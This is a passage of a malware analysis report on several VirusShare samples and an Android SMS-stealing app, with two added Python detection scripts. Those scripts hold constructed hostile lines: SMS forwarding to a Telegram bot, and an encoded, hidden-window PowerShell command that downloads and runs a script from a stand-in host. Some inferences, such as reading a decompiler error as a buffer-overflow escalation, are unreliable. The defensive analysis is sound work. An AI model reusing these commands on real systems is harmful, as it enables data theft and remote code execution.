  d. Use hashes to identify malware and confirm maliciousness with virustotal.com

Tool used: HashTab

From the VirusTotal result above, the file is detected as PDF:PhishingX-gen. This is a detection name for a PDF carrying phishing content: the document tries to trick the reader into clicking malicious links, downloading additional malware, or disclosing sensitive information by presenting deceptive content inside the PDF.

VI. Wedding.apk

  a. Identify the file type

Looking at the file in HxD, it is not a PE file; it starts with the PK (50 4B) signature of a ZIP archive.

Using PE Studio, it is also not detected as a PE file but as a PK (ZIP) file.

From the "file" command output above, the file is an Android APK (which is a ZIP package).

From the binwalk results above, the file contains zip-archived data.

  b. Identify if the file is obfuscated / packed

Analyzing this file with PEiD returns "Not a valid PE file", meaning it does not match the basic PE signature (it is not a Portable Executable).

Using Detect It Easy with recursive, deep, verbose and heuristic scan modes, no obvious packer / obfuscation is detected.

The file is detected as an Android APK built with Kotlin and the Jetpack libraries.

  c. Look for important strings in the file (function names or imported libraries)

Using the "strings" command

First, we scan for ASCII strings only:

$ strings.exe -a -n 5 "C:\Users\IEUser\Desktop\Malwares\virusshare\2\wedding.apk" > "C:\Users\IEUser\Desktop\Results\String Results\wedding_Ascii.txt"

Notes

  • -a → search for ASCII strings only
  • -n 5 → output only strings that are at least 5 characters long (shorter strings are mostly noise)
  • "C:\Users\IEUser\Desktop\Results\String Results\wedding_Ascii.txt" → redirect the result to a text file so that we can analyse it more easily

You can see the full results here: https://drive.google.com/file/d/1BWgr9MvuLoz8OK9WFRCtt0Gg2eFtHaEq/view?usp=drive_link

From this result there are some interesting items: the strings in the image above look like the APK's signing certificate and the manifest file name. Note that an APK is a compressed ZIP, so most code strings live inside the compressed classes.dex and only become visible after unzipping or decompiling, which is why JADX is used in the advanced static analysis below.

Next, we scan for Unicode strings only:

$ strings.exe -u -n 5 "C:\Users\IEUser\Desktop\Malwares\virusshare\2\wedding.apk" > "C:\Users\IEUser\Desktop\Results\String Results\wedding_Unicode.txt"

Notes

  • -u → search for Unicode (UTF-16) strings only
  • -n 5 → output only strings that are at least 5 characters long (shorter strings are mostly noise)
  • "C:\Users\IEUser\Desktop\Results\String Results\wedding_Unicode.txt" → redirect the result to a text file so that we can analyse it more easily

You can see the full results here: https://drive.google.com/file/d/1R0cIHsd2ayV_VHsTdrfj_WZiDoVLrdXx/view?usp=drive_link

From this result there are some interesting items: looking at the image above, the program appears to spy on the target device's SMS service.

Using PE Explorer

PE Explorer cannot load this file, since it is neither an EXE nor a DLL.

  d. Use hashes to identify malware and confirm maliciousness with virustotal.com

Tool used: HashTab

From the VirusTotal result above, the file is categorized as A Variant Of Android/Spy.SmsSpy.YW. Android SmsSpy is spyware designed to secretly monitor and intercept SMS (Short Message Service) communications on Android devices. This type of malware is used for espionage or surveillance, letting attackers collect sensitive information such as text messages, contact lists, and call logs from the compromised device.

B. Advanced Static Analysis

Definition

Reverse-engineering the malware's internals by loading the executable into a disassembler / decompiler and reading the program's instructions.

Reverse Engineering Definition

The process of converting binary instructions into a higher-level representation so that we can see what the program does.

Objectives

  • Tell us exactly what the program does
  • Understand the malware's behaviour by analyzing the program's control flow
  • Detect malicious code paths
  • Assess third-party components and libraries (which may be the channel the attacker uses to reach the target)

Tools Used

  • Ghidra
  • JADX (for Android apps)

  1. VirusShare_1ad9a67240d5775395c45b64dd6529fa

Here we use Ghidra (better suited to PE analysis). The graph below shows the program flow.

From the graph we can see an initial function followed by an if statement: when the condition holds, two other functions are called; otherwise execution goes straight to the end of the program.

FUN_004016C4 appears to be some sort of memory allocation routine.

004016e9 appears to be the start of the if statement.

004016ef appears to be the start of the if body, executed when the condition is true.

004016ff appears to be the start of the memory address assignment.

LAB_0040171f appears to be the exit label where FUN_004016C4 returns its value.

Advapi32.dll

The function above appears to adjust (disable) all privileges on the process token and to allocate process memory for further calls.

Kernel32.dll

The function above appears to create and manage processes and threads (starting or terminating processes, creating threads, managing process memory).

User32.dll

The function above appears to create the advertisement windows.

  1. 2. Wedding.apk

Here, we’re gonna be using JADX

From the above file, it seems like the there’s an error “arrayindexoutofbounds” at index 3447  out of 115 length. That seems like possible buffer overflow attack to automatically escalate this app’s privilege without asking for the user’s

permission.

From the image above, there are several files that are interesting to analyze (they have to do with some SMS services)

MainActivity

The function above registers the broadcast receiver and asks the victim to open a Telegram link.

The function above requests the SMS receive/send permissions. It also loads a URL which appears to be an HTML document.

The function above is triggered once the permission request completes. If the permission is granted, it sends a phishing SMS: "Selamat Nomor Kamu Mendapatkan Koin 1000 + sudah masuk ke nomor kamu Silakan cek di *363# Buruaan Sebelum Hangus" (Indonesian: "Congratulations, your number has received 1000+ coins, already credited to your number. Check at *363#. Hurry before it expires").

ReceiveSMS

The function above listens for SMS messages on the target device and forwards each received message to the attacker's Telegram account, printing out the message and the device type.

SendSMS

The function above sends the messages to the attacker's Telegram account, with the receiver and the message body as its content.
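What made the JADX walkthrough conclusive was not any single API but the combination: a BroadcastReceiver that reads incoming SMS, an exfiltration path to a Telegram bot, and a sendTextMessage call sitting inside onRequestPermissionsResult so the lure goes out the moment the victim taps "Allow". As an added example (not the project's code and not the real app's source), the script below scans decompiled Java for those indicators, tracks the enclosing method by brace depth so it knows which method a call sits in, and only reports a verdict for the combinations. The WEDDING_SOURCES and BENIGN_SOURCES snippets are constructed to resemble the decompiled classes described above; the lure URL uses a reserved .invalid name.

```python
"""Scan decompiled Android sources (e.g. a JADX export) for the SMS-stealer pattern:
intercept incoming SMS, forward them to a Telegram bot, and spam as soon as permission is granted."""
import re

# Line-level indicators in decompiled Java.
INDICATORS = {
    "sms_permission": re.compile(r"android\.permission\.(?:RECEIVE|READ|SEND)_SMS"),
    "sms_read": re.compile(r"getMessagesFromIntent|SmsMessage\.createFromPdu|Telephony\.SMS_RECEIVED"),
    "sms_send": re.compile(r"\bsendTextMessage\s*\("),
    "telegram_bot": re.compile(r"api\.telegram\.org/bot"),
    "remote_page": re.compile(r"\.loadUrl\(\s*\"https?://"),
}
# A method declaration whose opening brace is on the same line, which is how JADX formats output.
METHOD_DECL = re.compile(
    r"^\s*(?:(?:public|protected|private|static|final|synchronized)\s+)*[\w.<>\[\]]+\s+(\w+)\s*\([^;{]*\)\s*(?:throws\s+[\w.,\s]+)?\{")
NOT_A_METHOD = re.compile(r"^\s*(?:if|else|for|while|switch|catch|return|new)\b")

def scan_file(path, text):
    """Yield (indicator, path, line_no, enclosing_method); the method is tracked by brace depth."""
    depth, method, method_depth = 0, None, -1
    for no, line in enumerate(text.splitlines(), 1):
        m = METHOD_DECL.match(line)
        if m and not NOT_A_METHOD.match(line):
            method, method_depth = m.group(1), depth
        for tag, rx in INDICATORS.items():
            if rx.search(line):
                yield tag, path, no, method
        depth += line.count("{") - line.count("}")
        if method is not None and depth <= method_depth:  # the method's closing brace
            method = None

def scan_tree(sources):
    """sources: {relative path: decompiled text}."""
    return [hit for path, text in sources.items() for hit in scan_file(path, text)]

def verdict(hits):
    """Only combinations count: any messaging app sends SMS, a stealer also reads and exfiltrates them."""
    reasons = []
    reads = [h for h in hits if h[0] == "sms_read" and h[3] == "onReceive"]
    exfil = [h for h in hits if h[0] == "telegram_bot"]
    if reads and exfil:
        reasons.append(f"intercepts incoming SMS in {reads[0][1]} and forwards them to a Telegram bot ({exfil[0][1]})")
    spam = [h for h in hits if h[0] == "sms_send" and h[3] == "onRequestPermissionsResult"]
    if spam:
        reasons.append(f"sends an SMS the moment the SMS permission is granted ({spam[0][1]}:{spam[0][2]})")
    return reasons

# Constructed decompiled snippets shaped like the Wedding.apk walkthrough above (not the real app's code).
WEDDING_SOURCES = {
    "MainActivity.java": """\
public class MainActivity extends Activity {
    @Override
    protected void onCreate(Bundle b) {
        super.onCreate(b);
        registerReceiver(new ReceiveSMS(), new IntentFilter("android.provider.Telephony.SMS_RECEIVED"));
        this.web.loadUrl("https://lure.example.invalid/undangan.html");
        ActivityCompat.requestPermissions(this, new String[]{"android.permission.RECEIVE_SMS", "android.permission.SEND_SMS"}, 1);
    }
    @Override
    public void onRequestPermissionsResult(int code, String[] perms, int[] results) {
        if (results.length > 0 && results[0] == 0) {
            SmsManager.getDefault().sendTextMessage(this.target, null, "Selamat Nomor Kamu Mendapatkan Koin 1000 ...", null, null);
        }
    }
}
""",
    "ReceiveSMS.java": """\
public class ReceiveSMS extends BroadcastReceiver {
    @Override
    public void onReceive(Context c, Intent i) {
        for (SmsMessage m : Telephony.Sms.Intents.getMessagesFromIntent(i)) {
            new SendSMS().execute(m.getOriginatingAddress(), m.getMessageBody(), Build.MODEL);
        }
    }
}
""",
    "SendSMS.java": """\
public class SendSMS extends AsyncTask<String, Void, Void> {
    protected Void doInBackground(String... p) {
        String url = "https://api.telegram.org/bot" + TOKEN + "/sendMessage?chat_id=" + CHAT + "&text=" + p[0] + " " + p[1];
        return null;
    }
}
""",
}
# Constructed benign SMS composer: requests and uses SEND_SMS, but only on a button press.
BENIGN_SOURCES = {
    "ComposeActivity.java": """\
public class ComposeActivity extends Activity {
    protected void onCreate(Bundle b) {
        ActivityCompat.requestPermissions(this, new String[]{"android.permission.SEND_SMS"}, 1);
    }
    public void onSendClicked(View v) {
        SmsManager.getDefault().sendTextMessage(this.to.getText().toString(), null, this.body.getText().toString(), null, null);
    }
}
""",
}

if __name__ == "__main__":
    hits = scan_tree(WEDDING_SOURCES)
    for tag, path, no, method in hits:
        print(f"{path}:{no} [{tag}] in {method}")
    print("verdict:", verdict(hits) or ["no stealer pattern"])
```

The benign composer trips the same two raw indicators (SMS permission, sendTextMessage) yet gets no verdict, which is the point: on a real JADX tree, feed scan_tree a dict built from the exported .java files and read the per-method hits before trusting any single regex.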

C. Dynamic Analysis

Definition

Observing malware’s functionality by actually executing them

Objectives

  • Observing memory content
  • Observing network packets being transmitted / received
  • Observing modified files and registry keys
  • Observing list of API calls
  • Etc

Sandbox Definition

A security mechanism for running untrusted programs in a safe environment without fear of harming ‘real’ systems.

Tools Used

  • Triage
  • Any.run
  • Cuckoo
  1. VirusShare_01b55404de50bd1a56343b2f316ff88d

Tri.age

Using tri.age, the static analysis score is 10/10 malicious. It's identified as TrickBot (a modular banking trojan that primarily targets financial institutions, businesses and individuals for financial theft and other malicious activity).

We can see the device types it runs on.

We can also see the C2 IPs (the remote hosts the sample communicates with while it runs).

The two images above are the result of the dynamic analysis. The sample adjusts its privilege token, finds the shell tray, sends a notify message, writes process memory (which is consistent with process injection), etc., which could be related to its payment-fraud functionality.

Any.run

Below is the result of the dynamic analysis using anyrun.

From the image above, the maliciousness score is 5 out of 100. The sample drops an executable file immediately after start.

It also reads the machine GUID from the registry, reads the computer name and checks supported languages (typical host fingerprinting).

Cuckoo

Above is the result from the Cuckoo website: a TrickBot trojan, scored 10 out of 10 malicious.

  2. VirusShare_1ad9a67240d5775395c45b64dd6529fa

Tri.age

Using tri.age, the static analysis score is 1/10 malicious. Below is the result of the dynamic analysis.

The two images above give a dynamic score of 3/10 malicious. The program reads further information from the registry, adjusts its privilege token, finds the shell tray, sends a notify message (possibly for an ad pop-up), writes process memory and uses the Task Scheduler COM API (for persistence). From this we can conclude that it is probably adware.

Any.run

From the image above, the maliciousness score is 100 out of 100. The sample: reads the Internet Settings, reads the security settings of Internet Explorer, launches itself, reads Internet Explorer settings, reads the Microsoft Outlook installation path, checks supported languages, reads the computer name, creates files in a temporary directory, checks proxy server information, reads environment values, reads the product name, reads the machine GUID from the registry, and was manually executed by a user.

Cuckoo

Above is the result from the Cuckoo website: 10/10 suspicious. What it does:

Bypasses DEP, escalates privileges, runs a keylogger, and affects the system registry, the system token and the private profile.

  3. VirusShare_2fe5b00079aec2d8369a798230313ec8

Tri.age

Using tri.age, the static analysis score is 8/10 malicious. It's an Office macro (a set of malicious instructions or commands written in a scripting language such as Visual Basic for Applications (VBA) that can be embedded in Microsoft Office documents).

Below is the result of the dynamic analysis.

The two images above are the results of the dynamic analysis. When the sample runs, a DOC is opened automatically. It spawns an unexpected child process (PowerShell) that makes network requests, reads information from the registry, enumerates system information, adjusts its privilege token, etc. Basically it behaves like a trojan downloader: a document that opens automatically, spawns an unexpected child process and reaches out to the network.

Any.run

From the image above, the maliciousness score is 100 out of 100 for powershell.exe and 60 out of 100 for winword.exe (Microsoft Word, the application that opened the document).

It also does the following:

Creates an object to access WMI (script), writes non-standard symbols in the registry, executes powershell.exe via WMI, creates a file in the system drive root, PowerShell connects to the Internet, unusual connection from system programs, reads the Internet Settings, an automatically generated document, reads mouse settings.

Cuckoo

Above is the result from the Cuckoo website: 10 out of 10 malicious. It detects a UserForm object in the MS Office document and an MS Office document with embedded VBA macro code.
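The winword.exe to WMI to powershell.exe chain above is the classic maldoc downloader, and the PowerShell command line in a sandbox process tree is usually base64 of UTF-16LE behind -EncodedCommand (or any unambiguous prefix of it, such as -e or -enc), sometimes nested. As an added example (not code from this project or from any of the sandboxes), the script below peels those layers, flags the evasion switches on the outer command line, and extracts the download cradle and URLs from the final script. The command lines are constructed to look like that chain; the staging URL is a reserved .invalid name and the cradle/flag tables are illustrative.

```python
"""Decode a PowerShell -EncodedCommand chain from a sandbox process tree and pull out the download cradle."""
import base64
import re

# powershell.exe accepts any unambiguous prefix of -EncodedCommand; these are the spellings seen most often.
ENC_FLAG = re.compile(r"^-e(?:c|n|nc|ncodedcommand)?$", re.I)
EVASION = {
    re.compile(r"(?<!\S)-nop(?:rofile)?\b", re.I): "skips the profile (-NoProfile)",
    re.compile(r"(?<!\S)-w(?:indowstyle)?\s+hidden\b", re.I): "hidden window",
    re.compile(r"(?<!\S)-e(?:p|xec|xecutionpolicy)\s+bypass\b", re.I): "execution policy bypass",
    re.compile(r"(?<!\S)-noni(?:nteractive)?\b", re.I): "non-interactive",
}
CRADLES = {
    "Net.WebClient download": re.compile(r"Net\.WebClient|DownloadString|DownloadFile", re.I),
    "Invoke-WebRequest / Invoke-RestMethod": re.compile(r"\b(?:iwr|irm|Invoke-WebRequest|Invoke-RestMethod)\b", re.I),
    "Start-BitsTransfer": re.compile(r"\bStart-BitsTransfer\b", re.I),
    "Invoke-Expression (runs the downloaded text)": re.compile(r"\b(?:iex|Invoke-Expression)\b", re.I),
}

def tokens(cmdline):
    """Split a Windows command line, keeping double-quoted arguments together."""
    return re.findall(r'"[^"]*"|\S+', cmdline)

def decode_encoded_command(cmdline, max_depth=5):
    """Peel -EncodedCommand layers (base64 of UTF-16LE); returns the decoded scripts, outermost first."""
    layers, current = [], cmdline
    for _ in range(max_depth):
        toks = tokens(current)
        b64 = next((toks[i + 1].strip('"') for i, t in enumerate(toks[:-1]) if ENC_FLAG.match(t)), None)
        if b64 is None:
            break
        try:
            current = base64.b64decode(b64, validate=True).decode("utf-16-le")
        except (ValueError, UnicodeDecodeError) as exc:   # binascii.Error is a ValueError
            layers.append(f"<undecodable: {exc}>")
            break
        layers.append(current)
    return layers

def analyze(cmdline):
    """Evasion switches from the outer command line; cradles and URLs from the innermost script."""
    layers = decode_encoded_command(cmdline)
    script = layers[-1] if layers else cmdline
    return {
        "layers": layers,
        "flags": sorted(label for rx, label in EVASION.items() if rx.search(cmdline)),
        "cradles": [name for name, rx in CRADLES.items() if rx.search(script)],
        "urls": re.findall(r"https?://[^\s'\"();]+", script),
    }

def encode(script):
    """What the maldoc builder does: UTF-16LE, then base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode()

# Constructed command lines shaped like the winword -> powershell chain above; the URL is a reserved .invalid name.
INNER = "IEX (New-Object Net.WebClient).DownloadString('http://stage.example.invalid/payload.ps1')"
SAMPLE_CMDLINE = f"powershell.exe -nop -w hidden -ep bypass -enc {encode(INNER)}"
SAMPLE_NESTED = f'powershell -NoP -W Hidden -EncodedCommand {encode("powershell -e " + encode(INNER))}'

if __name__ == "__main__":
    for cmd in (SAMPLE_CMDLINE, SAMPLE_NESTED):
        result = analyze(cmd)
        print(f"layers: {len(result['layers'])}, flags: {result['flags']}")
        print(f"cradles: {result['cradles']}, urls: {result['urls']}")
        print(f"final script: {result['layers'][-1]}\n")
```

Paste the powershell.exe command line from the sandbox process tree into analyze(); if the innermost layer is still unreadable (string concatenation, -replace tricks, compressed streams), that is the point to stop static decoding and let the sandbox's script-block logging or a debugger give you the plaintext.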

  4. VirusShare_3f0b1eed4b7b9ae05fab4d949843f103

Tri.age

Using tri.age, the static analysis score is 8/10 malicious. It's a macro (a set of malicious instructions or commands written in a scripting language such as Visual Basic for Applications (VBA) that can be embedded in Microsoft Office documents).

Below is the result of the dynamic analysis.

From the two images above, the dynamic analysis score is only 1/10 malicious. The file enumerates system information in the registry, enumerates processes, adjusts its privilege token, finds the shell tray, sends a notify message and writes process memory. The file looks like an Excel downloader, but that is not well reflected in the dynamic analysis; a common reason is that the macro needs user interaction (enabling content) or an environment check that the sandbox did not satisfy, so the download stage never ran.

Any.run

From the image above, the maliciousness score is 15 out of 100. It also writes non-standard symbols in the registry. Malware may use non-standard symbols as part of its evasion or obfuscation: manipulating registry entries this way makes them harder for security software to detect or analyze.

Cuckoo

Above is the result from the Cuckoo website: this file is 10 out of 10 malicious. It detects an MS Office document with embedded VBA macro code.

  5. VirusShare_480ef02bb062a57724e1b3e14532a140

Tri.age

Using tri.age, the static analysis score is 3/10 malicious. Below is the result of the dynamic analysis.

From the image above we can see that the malware automatically opens a PDF, and clicking one of the images redirects to the following page:

Unfortunately the page is no longer available.

From the image above, we can see that the malware isn't very malicious by itself; its effect depends on the link the PDF opens.

The image above shows what the file does during the dynamic analysis.

Any.run

From the image above, the maliciousness score is 20 out of 100. The sample creates a file in the system drive root, launches itself, reads Microsoft Office registry keys and drops an executable file immediately after start.

Cuckoo

Above is the result from the Cuckoo website: 10/10 malicious. It's detected as a PDF trojan / phishing document.

  6. Wedding.apk

Tri.age

Using tri.age, the static analysis score is 1/10 malicious.

Below is the result of the dynamic analysis.

From the image above, the maliciousness score is 5 out of 100, and the listed behaviour is the same as for the first sample: drops an executable file immediately after start, reads the machine GUID from the registry, reads the computer name, checks supported languages. These are Windows-host indicators (Android has no registry or machine GUID), so this result cannot describe what the APK itself does and should not be relied on for this sample.

Cuckoo

Above is the result from the Cuckoo website: 8.7/10 malicious. It's flagged as shellcode (code designed to exploit vulnerabilities in software or systems, often with the intent of compromising security, gaining unauthorized access or harming the target system).